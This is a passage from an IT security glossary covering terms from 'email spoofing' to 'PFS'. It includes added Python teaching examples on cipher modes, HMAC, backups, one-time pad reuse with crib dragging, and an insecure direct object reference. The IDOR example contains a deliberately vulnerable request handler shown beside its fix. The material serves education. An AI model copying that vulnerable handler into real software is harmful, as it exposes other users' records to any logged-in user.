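    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def _blocks(data: bytes):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def ecb_encrypt(key, pt):      # every block encrypted independently
    return b"".join(block_encrypt(key, b) for b in _blocks(pad(pt)))


def ecb_decrypt(key, ct):
    return unpad(b"".join(block_decrypt(key, c) for c in _blocks(ct)))


def cbc_encrypt(key, iv, pt):  # C_i = E(P_i xor C_{i-1}), with C_0 = IV
    out, prev = [], iv
    for b in _blocks(pad(pt)):
        prev = block_encrypt(key, _xor(b, prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, ct):  # P_i = D(C_i) xor C_{i-1}
    out, prev = [], iv
    for c in _blocks(ct):
        out.append(_xor(block_decrypt(key, c), prev))
        prev = c
    return unpad(b"".join(out))


def cbc_mac(key, msg):         # CBC with a zero IV; the last block is the tag
    return cbc_encrypt(key, bytes(BLOCK), msg)[-BLOCK:]


def cfb_encrypt(key, iv, pt):  # keystream = E(previous ciphertext); no padding
    out, reg = [], iv
    for b in _blocks(pt):
        reg = _xor(b, block_encrypt(key, reg)[:len(b)])
        out.append(reg)
    return b"".join(out)


def cfb_decrypt(key, iv, ct):  # the block cipher is only ever run forwards
    out, reg = [], iv
    for c in _blocks(ct):
        out.append(_xor(c, block_encrypt(key, reg)[:len(c)]))
        reg = c
    return b"".join(out)


def ctr_crypt(key, nonce, data):  # E(nonce || counter) xor block; self-inverse
    out = []
    for i, b in enumerate(_blocks(data)):
        keystream = block_encrypt(key, nonce[:4] + i.to_bytes(4, "big"))
        out.append(_xor(b, keystream))
    return b"".join(out)
```

Encrypting the two identical blocks of b"ATTACK!!ATTACK!!" with ecb_encrypt yields two identical ciphertext blocks, while cbc_encrypt does not; that is the pattern leak the ECB entry warns about. Note that none of these modes authenticates the ciphertext: CBC decryption of a tampered message either succeeds with garbled output or raises a padding error, and that error itself leaks information (the padding-oracle attack), so in practice a mode is paired with a MAC or replaced by an AEAD mode such as GCM.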

email spoofing The process of sending an email that appears to come from one source when it really comes from another.

emergency response team A team that is composed of organizational personnel who are responsible for handling any emergencies that occur.

Encapsulating Security Payload (ESP) An IPsec component that provides data integrity, data origin authentication, protection from replay attacks, and data confidentiality.

Encrypting File System (EFS) A file system included in most versions of Windows that provides encryption.

encryption The process of converting data from plaintext to ciphertext. Also referred to as enciphering.

endorsement key (EK) TPM persistent memory installed by the manufacturer that contains a unique public/private key pair. The EK identifies the TPM and is not used directly to sign attestation data, which is why attestation identity keys exist.

enrollment time The time required to obtain the reference sample (template) that a biometric system will later compare against.

entropy The randomness collected by an application that is used in cryptography or other uses that require random data, which is often collected from hardware sources.

exploitation tools Tools used to exploit security holes.

exposure factor (EF) The percent value or functionality of an asset that will be lost when a threat event occurs.

external actor A threat actor that comes from outside the organization.

Extensible Access Control Markup Language (XACML) A standard for an access control policy language using XML.

Extensible Authentication Protocol (EAP) An authentication framework (rather than a single protocol) that carries different authentication methods such as EAP-TLS and PEAP. It is used by 802.1X for port-based access control with the same three roles used with RADIUS: the supplicant, the authenticator, and the authentication server.

Extensible Messaging and Presence Protocol (XMPP) An open, XML-based protocol for instant messaging and presence information; it can be secured with TLS.

facial scan A scan that records facial characteristics, including bone structure, eye width, and forehead size.

facilities manager A person who ensures that all organizational buildings are maintained, including building maintenance and custodial services.

failover The capacity of a system to switch over to a backup system if a failure occurs in the primary system.

failsoft The capability of a system to terminate noncritical processes when a failure occurs.

false acceptance rate (FAR) A measurement of the percentage of invalid users that will be falsely accepted by the system. This is called a Type II error. Type II errors are more dangerous than Type I errors.

false rejection rate (FRR) A measurement of valid users that will be falsely rejected by the system. This is called a Type I error.

feature extraction An approach to obtaining biometric information from a collected sample of a user’s physiological or behavioral characteristics.

federated identity A portable identity that can be used across businesses and domains.

Fibre Channel over Ethernet (FCoE) A technology that encapsulates Fibre Channel frames within Ethernet frames, much as iSCSI encapsulates SCSI commands in TCP/IP packets.

file-level encryption Encryption performed per file, where each file owner has a key.

fingerprint scan A scan that records the ridges of a finger for matching.

fingerprinting Using tools to scan a network, identify hosts, and identify services and applications available on those hosts.

finger scan A scan that extracts only certain features from a fingerprint.

Federal Information Processing Standard (FIPS) 199 A U.S. government standard for categorizing information assets for confidentiality, integrity, and availability.

Flash A multimedia and software platform used for creating vector graphics, animation, games, and rich Internet applications. Adobe ended support for Flash Player at the end of 2020.

formal code review An extremely thorough, line–by-line code inspection, usually performed by multiple participants using multiple phases.

Frequency Division Multiple Access (FDMA) One of the channel-access techniques used in cellular wireless networks. It divides the frequency range into bands and assigns a band to each subscriber. FDMA was used in 1G cellular networks.

Frequency Hopping Spread Spectrum (FHSS) One of two technologies (along with DSSS) that were part of the original 802.11 standard. It is unique in that it rapidly changes frequencies, or channels, in a set hopping pattern that both transmitter and receiver know.

FTPS FTP extended with Transport Layer Security (TLS), formerly Secure Sockets Layer (SSL), to protect the control channel and, optionally, the data channel. Not to be confused with SFTP, a separate file transfer protocol that runs over SSH.

full backup A backup in which all data is backed up, and the archive bit for each file is cleared.

full-knowledge test A test in which the testing team is provided with all available knowledge regarding the organization’s network.

fuzz testing methods (fuzzing) A testing method that injects invalid or unexpected input (sometimes called faults) into an application to test how the application reacts.

fuzzers Software tools that automate fuzz testing by generating malformed or unexpected input for an application, network service, or file parser and watching for crashes, hangs, or other unexpected behavior. A fuzzer finds weaknesses; confirming that a finding is exploitable is a separate step.

geo-fencing A technology that uses GPS to define geographic boundaries.

geo-location A technology that allows location and time information about an asset to be tracked, provided that the appropriate feature is enabled on the device.

geotagging The process of adding geographical identification metadata to various media.

Global System for Mobile Communications (GSM) A 2G cellular standard. GSM phones contain a removable Subscriber Identity Module (SIM) chip that holds the subscriber’s identity and authentication key, and the SIM must be present in the phone for it to register on the network.

GPS location A technology that allows location and time information about an asset to be tracked, provided that the appropriate feature is enabled on the device.

graphical passwords Passwords that use graphics as part of the authentication mechanism, such as selecting a sequence of images or clicking points on a picture. Not to be confused with CAPTCHA, which challenges a user to prove that he is human rather than to prove who he is.

gray box testing Testing in which the team is provided more information than is provided in black box testing, while not as much as is provided in white box testing.

gray hat An entity that breaks into an organization’s system(s) and is considered somewhere between white hat and black hat. A gray hat typically breaks into a system without authorization, notifies the administrator of the security hole, and may offer to fix the security issues for a fee.

GRE tunnels An IPv4–to-IPv6 transition method that can be used to carry IPv6 packets across an IPv4 network by encapsulating them in GRE IPv4 packets.

guideline An information security governance component that gives recommended actions that are much more flexible than standards, thereby providing allowance for circumstances that can occur.

hacktivist A person who uses the same tools and techniques as a hacker but does so to disrupt services and bring attention to a political or social cause.

hand geometry scan A scan that obtains size, shape, or other layout attributes of a user’s hand and can also measure bone length or finger length.

hand topography scan A scan that records the peaks and valleys of a user’s hand and its shape.

hardware security module (HSM) An appliance that safeguards and manages digital keys used with strong authentication and provides crypto processing.

hash A one-way function that reduces a message of any length to a fixed-size hash value (digest). If the hash value computed by the sender matches the hash value computed by the receiver, using the same hash function, the message has not been altered; if the resultant hash values are different, the message has changed in some way. A bare hash detects only accidental alteration: an attacker who can change the message can also recompute its hash, so integrity against a deliberate attacker requires a keyed hash (see hash MAC) or a digital signature.

hash MAC A keyed-hash MAC that involves a hash function with a symmetric key.
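The hash and hash MAC entries above are best contrasted side by side. The following is an added example, not part of the glossary: the message and the shared key are constructed, and the attacker is assumed to sit on the path between sender and receiver. It shows that an attacker can rewrite a message and its plain hash together, while the same attacker cannot produce a valid HMAC tag without the key.

```python
"""Added illustration (not from the glossary): a bare hash detects
accidental corruption but not deliberate tampering; a keyed hash (HMAC)
closes the gap. Message and key are constructed for the example."""
import hashlib
import hmac

# Constructed message and a hypothetical shared secret.
MESSAGE = b"transfer 100 to account 4242"
SHARED_KEY = b"example-shared-secret-key"  # in practice: random, >= 32 bytes


def digest(message: bytes) -> str:
    """Unkeyed SHA-256 over the message (integrity against accidental change)."""
    return hashlib.sha256(message).hexdigest()


def tag(message: bytes, key: bytes) -> str:
    """HMAC-SHA256 tag; only holders of the key can produce a valid one."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def verify_digest(message: bytes, received_digest: str) -> bool:
    """Receiver recomputes the hash and compares."""
    return hmac.compare_digest(digest(message), received_digest)


def verify_tag(message: bytes, received_tag: str, key: bytes) -> bool:
    """Receiver recomputes the tag with the shared key and compares.
    compare_digest avoids leaking the mismatch position through timing."""
    return hmac.compare_digest(tag(message, key), received_tag)


def tamper_with_plain_hash(message: bytes):
    """On-path attacker rewrites the message AND recomputes the bare hash.
    Returns (forged_message, forged_digest); the receiver cannot tell."""
    forged = message.replace(b"account 4242", b"account 6666")
    return forged, digest(forged)


def tamper_with_hmac(message: bytes, attacker_key: bytes = b"guess"):
    """Same attacker, but the tag must be keyed and the real key is unknown."""
    forged = message.replace(b"account 4242", b"account 6666")
    return forged, tag(forged, attacker_key)


def demo():
    """Returns (plain_hash_fooled, hmac_fooled)."""
    forged_msg, forged_digest = tamper_with_plain_hash(MESSAGE)
    plain_fooled = verify_digest(forged_msg, forged_digest)      # True

    forged_msg2, forged_tag = tamper_with_hmac(MESSAGE)
    hmac_fooled = verify_tag(forged_msg2, forged_tag, SHARED_KEY)  # False
    return plain_fooled, hmac_fooled


if __name__ == "__main__":
    print("bare hash fooled, HMAC fooled:", demo())
```

The HMAC protects integrity and origin only between parties that share the key; it gives no nonrepudiation, because either party could have produced the tag. That property requires a digital signature.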

hash matching An attack on cloud storage services that deduplicate files by hash. A client presents the hash of a file it does not actually possess; the service treats the client as an owner of that file and grants access to another customer’s copy of the data.

HAVAL A one-way function that produces variable-length hash values, including 128 bits, 160 bits, 192 bits, 224 bits, and 256 bits and uses 1,024-bit blocks.

HBA allocation The process of confining certain ports on the host bus adapter (HBA) to certain zones for security.

hierarchical storage management (HSM) system A type of backup management system that provides a continuous online backup by using optical or tape “jukeboxes.”

HMAC See hash MAC.

host-based firewall A firewall that resides on a single host and is designed to protect that host only.

host-based IDS A system that monitors activity on a single host, such as log entries, file integrity, process behavior, and the host’s own network traffic. Its primary responsibility is to protect the system on which it is installed.

host bus adapter (HBA) A card in a server that accesses a storage network and performs any necessary translations between the protocols in use.

hot site A leased facility that contains all the resources needed for full operation.

HSM See hierarchical storage management system.

HTML (Hypertext Markup Language) 5 The latest version of the markup language that has been used on the Internet for years. It has been improved to support the latest multimedia (which is why it is considered a likely successor to Flash).

HTTP interceptors Software that intercepts web traffic between a browser and a website so that a tester can view and modify requests and responses in transit. They permit actions, such as altering hidden form fields or replaying requests, that the browser itself would not permit.

HTTPS See Hypertext Transfer Protocol Secure.

HTTP-Secure See Hypertext Transfer Protocol Secure.

hybrid cloud A cloud computing model in which the organization provides and manages some resources in-house and has others provided externally via a public cloud. It is some combination of a private and public cloud.

Hypertext Transfer Protocol Secure (HTTPS or HTTP-Secure) A security protocol that layers HTTP on top of the TLS/SSL protocol, thus adding the security capabilities of TLS/SSL to standard HTTP.

hypervisor A software component that manages the distribution of resources (CPU, memory, and disk) to virtual machines.

IA See interoperability agreement.

IDEA See International Data Encryption Algorithm.

identity propagation The passing or sharing of a user’s or device’s authenticated identity information from one part of a multitier system to another.

identity theft A situation in which someone obtains someone else’s personal information, including driver’s license number, bank account number, and Social Security number, and uses that information to assume the identity of the individual whose information was stolen.

IDS See intrusion detection system.

imprecise methods DLP methods that can include keywords, lexicons, regular expressions, extended regular expressions, metadata tags, Bayesian analysis, and statistical analysis.

incremental backup A backup in which all files that have been changed since the last full or incremental backup are backed up, and the archive bit for each file is cleared.
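The full backup and incremental backup entries turn on the archive bit: the operating system sets it whenever a file is written, and each backup type clears it differently. The following is an added example, not part of the glossary, with a constructed in-memory file system in place of a real one. It shows why an incremental chain can only be restored as the last full backup followed by every incremental since, in order.

```python
"""Added illustration (not from the glossary): archive-bit handling for
full and incremental backups, and restoring the resulting chain. The
file system and change history are constructed for the example."""


def make_fs():
    """Constructed file system: name -> (contents, archive_bit).
    Newly written files start with the archive bit set."""
    return {"a.txt": ("a-v1", True), "b.txt": ("b-v1", True), "c.txt": ("c-v1", True)}


def modify(fs, name, contents):
    """Writing a file sets its archive bit; the OS does this, not the backup tool."""
    fs[name] = (contents, True)


def full_backup(fs):
    """Copy every file regardless of the archive bit, then clear all bits."""
    snapshot = {name: contents for name, (contents, _) in fs.items()}
    for name, (contents, _) in fs.items():
        fs[name] = (contents, False)
    return {"kind": "full", "files": snapshot}


def incremental_backup(fs):
    """Copy only files whose archive bit is set, then clear those bits so the
    next incremental captures only changes made after this one."""
    snapshot = {name: contents for name, (contents, bit) in fs.items() if bit}
    for name in snapshot:
        fs[name] = (fs[name][0], False)
    return {"kind": "incremental", "files": snapshot}


def restore(backup_sets):
    """Replay a full set followed by its incrementals in chronological order.
    Replaying out of order would let an older version overwrite a newer one."""
    if not backup_sets or backup_sets[0]["kind"] != "full":
        raise ValueError("restore chain must start with a full backup")
    restored = {}
    for backup in backup_sets:
        restored.update(backup["files"])
    return restored


def scenario():
    """A week of constructed changes. Returns (backup_sets, restored_fs)."""
    fs = make_fs()
    sets = [full_backup(fs)]             # Sunday: everything, all bits cleared
    modify(fs, "a.txt", "a-v2")          # Monday's change
    sets.append(incremental_backup(fs))  # Monday: only a.txt
    modify(fs, "b.txt", "b-v2")          # Tuesday's changes
    modify(fs, "a.txt", "a-v3")
    sets.append(incremental_backup(fs))  # Tuesday: a.txt and b.txt
    return sets, restore(sets)


if __name__ == "__main__":
    sets, restored = scenario()
    for backup in sets:
        print(backup["kind"], sorted(backup["files"]))
    print("restored:", restored)
```

Losing any one incremental set breaks the chain from that point on, which is the availability cost of the bandwidth and time saved by not copying unchanged files. Note also that this scheme never records deletions: a file removed on Tuesday is still present after the restore.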

incremental model A refinement to the basic waterfall model which states that software should be developed in increments of functional capability.

informative security policy A security policy that provides information on certain topics and acts as an educational tool.

Information Technology Infrastructure Library (ITIL) A set of best-practice publications for IT service management, originally developed by the UK government’s Central Computer and Telecommunications Agency (CCTA) and now maintained by AXELOS. It describes processes for delivering and supporting IT services, including change, incident, and problem management.

infrared A short-distance wireless process that uses light—in this case infrared light—rather than radio waves. It is used for short connections between devices that each have an infrared port. It operates up to 5 meters at speeds up to 4 Mbps and requires a direct line of sight between the devices.

Infrastructure as a Service (IaaS) A cloud computing model in which the vendor provides the hardware platform or data center and the company installs and manages its own operating systems and application systems. The vendor simply provides access to the data center and maintains that access.

infrastructure mode An 802.11 WLAN mode in which all transmissions between stations go through the AP, and no direct communication between stations occurs.

inherent risk Risk that is virtually impossible to avoid.

inline network encryptor (INE) An NSA Type 1 encryption device placed in the path between a protected network and an untrusted transport network so that all traffic crossing it is encrypted.

input validation The process of checking all input for things such as proper format and proper length.

insecure direct object reference flaw A flaw in which an application exposes a reference to an internal object (a database key, file name, or account number) and does not verify that the requesting user is authorized for that object. The attack typically comes from an authenticated user who alters the reference, for example by changing an ID in a URL, to access information to which he should not have access.
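The flaw above and its fix, as an added example that is not part of the glossary. The record store and the handler functions are constructed stand-ins for a web framework’s database and request handlers; the vulnerable handler trusts the client-supplied identifier, and the fixed one enforces ownership against the identity taken from the session.

```python
"""Added illustration (not from the glossary): an insecure direct object
reference and the authorization check that fixes it. The data store and
handlers are constructed stand-ins for a web application."""

# Constructed data store: invoice id -> owner and amount.
INVOICES = {
    1001: {"owner": "alice", "amount": 120.00},
    1002: {"owner": "bob", "amount": 999.00},
}


class Forbidden(Exception):
    """Raised when the session user is not allowed to see the object."""


def get_invoice_vulnerable(session_user: str, invoice_id: int) -> dict:
    """Vulnerable: the user is authenticated, but the handler then trusts the
    id from the request. Any logged-in user can walk 1000, 1001, 1002, ...
    and read every other customer's invoice."""
    return INVOICES[invoice_id]


def get_invoice_fixed(session_user: str, invoice_id: int) -> dict:
    """Fixed: look the object up, then enforce ownership on the server side
    using the identity from the session, never a value from the request."""
    invoice = INVOICES.get(invoice_id)
    # Same failure for 'does not exist' and 'not yours', so the response does
    # not tell an attacker which ids are valid.
    if invoice is None or invoice["owner"] != session_user:
        raise Forbidden(f"user {session_user} may not access invoice {invoice_id}")
    return invoice


def attacker_can_read(handler, session_user: str, invoice_id: int) -> bool:
    """Simulate a logged-in user tampering with the id in the URL."""
    try:
        handler(session_user, invoice_id)
        return True
    except (Forbidden, KeyError):
        return False


if __name__ == "__main__":
    print("vulnerable handler leaks bob's invoice to alice:",
          attacker_can_read(get_invoice_vulnerable, "alice", 1002))
    print("fixed handler leaks bob's invoice to alice:",
          attacker_can_read(get_invoice_fixed, "alice", 1002))
```

Scoping the database query to the session user (for example a WHERE owner = :user clause) or handing the client an indirect, per-user reference instead of the raw key are equivalent mitigations; what matters is that authorization is checked per object on every request.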

instant messaging A service often integrated with messaging software that allows real-time text and video communication.

integer overflow Behavior that occurs when an arithmetic operation attempts to create a numeric value that is too large to be represented within the available storage space.

integrity A characteristic provided if you can be assured that the data has not changed in any way. The tenet of the CIA triad that ensures that data is accurate and reliable.

Integrity Measurement Architecture (IMA) A kernel integrity subsystem that can be used to attest to a system’s runtime integrity.

interconnection security agreement (ISA) An agreement between two organizations that own and operate connected IT systems to document the technical requirements of the interconnection.

internal actor A threat actor that comes from within an organization.

International Data Encryption Algorithm (IDEA) A block cipher that uses 64-bit blocks, which are divided into four 16-bit sub-blocks. It uses a 128-bit key and performs eight rounds of transformations on the sub-blocks, followed by a final output transformation.

Internet Key Exchange (IKE) The protocol that authenticates IPsec peers, negotiates security associations, and establishes the shared session keys through an authenticated Diffie-Hellman exchange. IKE is built on the ISAKMP framework; IKEv2 (RFC 7296) is the current version. Also sometimes referred to as IPsec Key Exchange.

Internet Protocol Security (IPsec) A suite of protocols that establishes a secure channel between two devices. IPsec can provide encryption, data integrity, and peer (system-level) authentication, which makes it a flexible option for protecting transmissions.

Internet Security Association and Key Management Protocol (ISAKMP) An IPsec component that handles the creation of a security association for a session and the exchange of keys.

Internet Small Computer System Interface (iSCSI) A standard method of encapsulating SCSI commands (which are used with storage area networks) within IP packets.

interoperability agreement (IA) An agreement between two or more organizations to work together to allow information exchange.

intrusion detection system (IDS) A system responsible for detecting unauthorized access or attacks against systems and networks.

intrusion prevention system (IPS) A system responsible for preventing attacks. When an attack begins, an IPS takes action to block and contain the attack rather than only reporting it.

IPsec See Internet Protocol Security.

IPv6 An IP addressing scheme designed to provide a virtually unlimited number of IP addresses. It uses 128 bits rather than 32, as in IPv4, and it is represented in hexadecimal rather than dotted-decimal format.

iris scan A scan of the colored portion of the eye, including all rifts, coronas, and furrows.

ISAKMP See Internet Security Association and Key Management Protocol.

iSCSI See Internet Small Computer System Interface.

ISO 27000 A series of information security standards published jointly by the International Organization for Standardization (ISO) and the International Electrotechnical Commission (IEC), also known as ISO/IEC 27000. The series describes how to develop, implement, and maintain an information security management system (ISMS): ISO/IEC 27001 specifies the ISMS requirements, and ISO/IEC 27002 provides the supporting security control guidance.

issue-specific security policy A security policy that addresses specific security issues.

ITIL See Information Technology Infrastructure Library.

JAD See joint analysis (or application) development model.

Java applet A small component created using Java that runs in a web browser. It is platform independent because the Java compiler produces intermediate code called byte code that is not processor specific. Applets are deprecated and are no longer supported by current browsers.

JavaScript A dynamic computer programming language commonly used as part of web browsers to allow the use of client-side scripts.

JavaScript Object Notation (JSON) A simple text-based message format that is often used with RESTful web services.

job rotation A security measure which ensures that more than one person fulfills the job tasks of a single position within an organization. It involves training multiple users to perform the duties of a position to help prevent fraud by any individual employee.

joint analysis (or application) development model (JAD) A development model that uses a team approach. It uses workshops to both agree on requirements and to resolve differences.

JSON See JavaScript Object Notation.

kernel proxy firewall A fifth-generation firewall that inspects a packet at every layer of the OSI model but does not introduce the performance hit of an application-layer firewall because it does this at the kernel layer.

Kerberos A ticket-based authentication and authorization system used in UNIX and Active Directory.

key A parameter that controls the transformation of plaintext into ciphertext or vice versa. Without the key, determining the original plaintext from the ciphertext should be computationally infeasible. Also referred to as a cryptovariable.

keystroke dynamics A biometric authentication technique that measures a user’s typing pattern when inputting a password or other predetermined phrase.

Layer 2 Tunneling Protocol (L2TP) A tunneling protocol that operates at layer 2 of the OSI model. Like PPTP, it can use various authentication mechanisms, but it does not provide any encryption of its own, so it is normally run inside IPsec (L2TP/IPsec).

LDAP See Lightweight Directory Access Protocol.

legacy systems Old technologies, computers, or applications that are considered outdated but provide a critical function in the enterprise.

lightweight code review A cursory code inspection, usually done as a normal part of the development process.

Lightweight Directory Access Protocol (LDAP) A common directory service standard that is based on the earlier standard X.500.

likelihood A probability or chance of a risk occurring.

latency The delay typically incurred in the processing of network data.

least privilege A security principle which requires that a user or process be given only the minimum access privilege needed to perform a particular task.

live migration A system’s migration of a VM from one host to another when needed.

load balancing A computer method for distributing workload across multiple computing resources.

logical control A software or hardware component used to restrict access. See also technical control.

logical deployment diagram A diagram that shows the logical architecture, including the domain architecture (the existing domain hierarchy, names, and addressing scheme), server roles, and trust relationships.

logical unit number (LUN) A number that identifies a section of data storage.

LUN masking or mapping The process of controlling access to a LUN by effectively “hiding” its existence from those who should not have access.

magnitude Size or extent.

maintainability How often a security solution or device must be updated and how long the updates take.

malware sandboxing The process of confining malware to a protected environment until it can be studied, understood, and mitigated.

management controls Controls implemented to administer an organization’s assets and personnel and include security policies, procedures, standards, baselines, and guidelines that are established by management. See also administrative control.

management interface An interface that is used to access a device over a network, using utilities such as SSH and Telnet. Telnet sends credentials in cleartext, so SSH should be used, and the interface should be reachable only from a management network.

management plane The component or plane on a networking device such as a router or switch that is used to administer the device.

maximum tolerable downtime (MTD) The maximum amount of time that an organization can tolerate a single resource or function being down.

MD2 A message digest algorithm that produces a 128-bit hash value and performs 18 rounds of computations.

MD4 A message digest algorithm that produces a 128-bit hash value and performs only 3 rounds of computations. It is broken and should not be used.

MD5 A message digest algorithm that produces a 128-bit hash value and performs 4 rounds of computations. Practical collision attacks exist, so it must not be relied on for integrity protection or digital signatures.

MD6 A message digest algorithm that produces a variable hash value, performing a variable number of computations.

mean time between failures (MTBF) The estimated amount of time a device will operate before a failure occurs. Describes how often a component fails, on average.

mean time to repair (MTTR) The average time required to repair a single resource or function when a disaster or other disruption occurs. Describes the average amount of time it takes to get a device fixed and back online.

Measured Boot (launch) A Windows boot process in which the firmware and each boot component measure (hash) the next component into the TPM’s platform configuration registers before loading it, producing a detailed, tamper-evident log of every component that loaded prior to the antimalware driver during startup. Antimalware software or a remote attestation server in a business environment can use this log, checked against the TPM-signed PCR values, to validate whether there may be malware on the computer or evidence of tampering with boot components.

memorandum of understanding (MOU) An agreement between two or more organizations that details a common line of action.

memory dumping Retrieving all information contained in memory.

mesh network A network in which all nodes cooperate to relay data and are all connected to one another. To ensure complete availability, continuous connections are provided by using self-healing algorithms to route around broken or blocked paths.

memory leaks Memory problems that cause memory to be exhausted over a period of time.

mobile device management (MDM) Tools used to secure the use of mobile devices on a corporate network.

motivation The reason behind an action.

MTBF See mean time between failures.

MTD See maximum tolerable downtime.

MTTR See mean time to repair.

multipath The use of multiple physical or virtual network paths to a storage device. This can provide both network fault tolerance and increased performance, depending on the exact configuration.

Multiple Input Multiple Output (MIMO) An 802.11 technology that uses multiple antennas, which allow for up to four spatial streams at a time, resulting in greater speeds.

multi-tenancy cloud model A cloud computing model in which multiple organizations share the resources.

National Institute of Standards and Technology (NIST) Special Publication (SP) A series of standards and guidance documents published by NIST, an agency of the U.S. Department of Commerce. The SP 800 series covers computer security; SP 800-53, for example, is the catalog of security and privacy controls used as a security controls development framework.

need to know A security principle under which access to specific information is granted only to those whose job or business function requires it, even if they hold a clearance for that level of information. It defines the minimum information each job or business function needs.

network administrator A person responsible for managing and maintaining an organization’s network.

network-attached storage (NAS) Storage that serves the same function as SAN but that is accessed by clients in a different way. In a NAS, almost any machine that can connect to the LAN (or is interconnected to the LAN through a WAN) can use protocols such as NFS, CIFS, or HTTP to connect to a NAS and share files.

Network File System (NFS) A method for accessing data in UNIX/Linux networks.

next-generation firewalls A category of devices that attempt to address traffic inspection and application awareness shortcomings of a traditional stateful firewall, without hampering performance.

network enumerator A network vulnerability tool that scans a network and gathers information about users, groups, shares, and services that are visible.

network intrusion detection system (NIDS) A system that is designed to monitor network traffic and detect and report threats.

network intrusion prevention system (NIPS) A system that can take action to prevent an attack from being realized.

nondisclosure agreement (NDA) An agreement between two parties that defines which information is considered confidential and cannot be shared outside the two parties.

nonrepudiation Proof of the origin of data, which prevents the sender from denying that he sent the message and supports data integrity.

numeric password A password that includes only numbers.

OCSP See Online Certificate Status Protocol.

OFB See output feedback.

one-time pad The only encryption scheme proven to be unbreakable. It works like a running cipher in that each key value is combined (added or XORed) with the corresponding plaintext value, but it uses a truly random key that is the same length as the plaintext message, is kept secret, and is never reused. Violating any of these conditions, especially reusing the pad, destroys its security.
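The one-time pad and the consequence of reusing it, as an added example that is not part of the glossary. The messages are constructed, XOR over bytes stands in for adding letter values, and secrets.token_bytes stands in for the true random source a real pad requires. With the pad used twice, the attacker XORs the two ciphertexts, which cancels the pad and leaves the XOR of the plaintexts; a guessed fragment of one message (a crib) then reveals the other.

```python
"""Added illustration (not from the glossary): a one-time pad over bytes,
and the two-time-pad leak that follows from reusing the pad. Messages are
constructed; secrets.token_bytes stands in for a true random source."""
import secrets


def otp_xor(data: bytes, pad: bytes) -> bytes:
    """XOR data with a pad at least as long as it. Encryption and decryption
    are the same operation because XOR is its own inverse."""
    if len(pad) < len(data):
        raise ValueError("pad must be at least as long as the message")
    return bytes(d ^ p for d, p in zip(data, pad))


def two_time_pad_leak(c1: bytes, c2: bytes) -> bytes:
    """If two messages share a pad, the pad cancels: c1 XOR c2 == p1 XOR p2.
    The attacker obtains this relation without ever seeing the key."""
    return otp_xor(c1, c2)


def crib_drag(xor_of_plaintexts: bytes, crib: bytes, offset: int) -> bytes:
    """Given a guessed fragment (crib) of one plaintext at a known offset,
    recover the bytes of the other plaintext at the same positions."""
    segment = xor_of_plaintexts[offset:offset + len(crib)]
    return otp_xor(segment, crib)


def demo():
    """Returns (decryption_ok, bytes_of_p2_recovered_without_the_pad)."""
    p1 = b"ATTACK AT DAWN"     # constructed message 1
    p2 = b"RETREAT AT ONCE"    # constructed message 2
    pad = secrets.token_bytes(max(len(p1), len(p2)))
    c1 = otp_xor(p1, pad)
    c2 = otp_xor(p2, pad)      # the mistake: same pad used twice
    n = min(len(c1), len(c2))
    leak = two_time_pad_leak(c1[:n], c2[:n])
    # Attacker guesses that p1 contains " AT " at offset 6 and recovers the
    # corresponding bytes of p2; the pad itself is never learned or needed.
    recovered = crib_drag(leak, b" AT ", 6)
    return otp_xor(c1, pad) == p1, recovered


if __name__ == "__main__":
    ok, recovered = demo()
    print("decrypts correctly:", ok)
    print("bytes of message 2 recovered from pad reuse:", recovered)
```

The same leak applies to any stream cipher or stream-like block mode (RC4, OFB, CTR) whenever a keystream is generated twice from the same key and IV, which is why IV and nonce reuse are treated as key-recovery-class failures.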

one-time password A password that is only used once to log in to an access control system. Also called a dynamic password.

one-way function A mathematical function that can be more easily performed in one direction than in the other.

Online Certificate Status Protocol (OCSP) An Internet protocol that obtains the revocation status of an X.509 digital certificate.

open authorization (OAuth) An authorization standard that allows a user to grant one site or application limited access to the user’s private resources on another site without sharing the user’s credentials with it; the client receives a scoped access token instead.

open standards Technologies that are available for use by all vendors.

OpenID (OID) An open standard and decentralized protocol by the nonprofit OpenID Foundation that allows users to be authenticated by certain cooperating sites.

operating-level agreement An internal organizational document that details the relationships that exist between departments to support business activities.

operational activities Activities that are carried out on a daily basis when using a device or technology.

Orange Book The Trusted Computer System Evaluation Criteria (TCSEC), a collection of criteria based on the Bell-LaPadula model that is used to grade or rate the security offered by a computer system product. It has been superseded by the Common Criteria.

organizational security policy The highest-level security policy adopted by an organization that outlines security goals.

Orthogonal Frequency Division Multiple Access (OFDMA) A technique that takes FDMA a step further by subdividing the frequencies into subchannels. This is the technique required by 4G devices.

Orthogonal Frequency Division Multiplexing (OFDM) A more advanced modulation technique in which a large number of closely spaced orthogonal subcarrier signals are used to carry data on several parallel data streams. It is used in 802.11a and 802.11g. It makes possible speeds up to 54 Mbps.

overt Not concealed; not secret.

output feedback (OFB) A block cipher mode of operation, defined for DES but usable with any block cipher, that turns the block cipher into a stream cipher. The cipher encrypts an initialization vector to produce a keystream block, which is XORed with the plaintext, and each keystream block is fed back as the next cipher input. Because the keystream depends only on the key and IV and not on the plaintext, bit errors do not propagate, but an IV must never be reused under the same key.

out-of-band (OOB) An interface connected to a separate and isolated network that is not accessible from the LAN or the outside world.

OWASP (Open Web Application Security Project) An organization that maintains a list of the top 10 errors found in web applications.

packet filtering firewall The type of firewall that is the least detrimental to throughput as it only inspects the header of the packet for allowed IP addresses or port numbers.

palm or hand scan A scan that combines fingerprint and hand geometry technologies. It records fingerprint information from every finger as well as hand geometry information.

passphrase password A password that requires the use of a long phrase. Because of the password’s length, it is easier to remember but much harder to attack, both of which are definite advantages. Incorporating upper- and lowercase letters, numbers, and special characters in this type of password can significantly increase authentication security.

partial-knowledge test A test in which the testing team is provided with some, but not all, knowledge regarding the organization’s network. Compare full-knowledge test and black box testing.

passive fingerprinting Fingerprinting that involves simply capturing packets from the network and examining them rather than sending packets on the network.

Password Authentication Protocol (PAP) A protocol that provides authentication but with which the credentials are sent in cleartext and can be read with a sniffer.

password cracker A program that attempts to guess passwords.

perfect forward secrecy (PFS) A property of a key-agreement protocol that ensures that a session key derived from a set of long-term keys cannot be compromised if one of the long-term keys is compromised in the future. To work properly, PFS requires two conditions: Keys must not be reused, and new keys must not be derived from previously used keys.

performance The manner in which or the efficiency with which a device or technology reacts or fulfills its intended purpose.

permutation See transposition.

personally identifiable information (PII) Any piece of data that can be used alone or with other information to identify a particular person.

PFS See perfect forward secrecy.

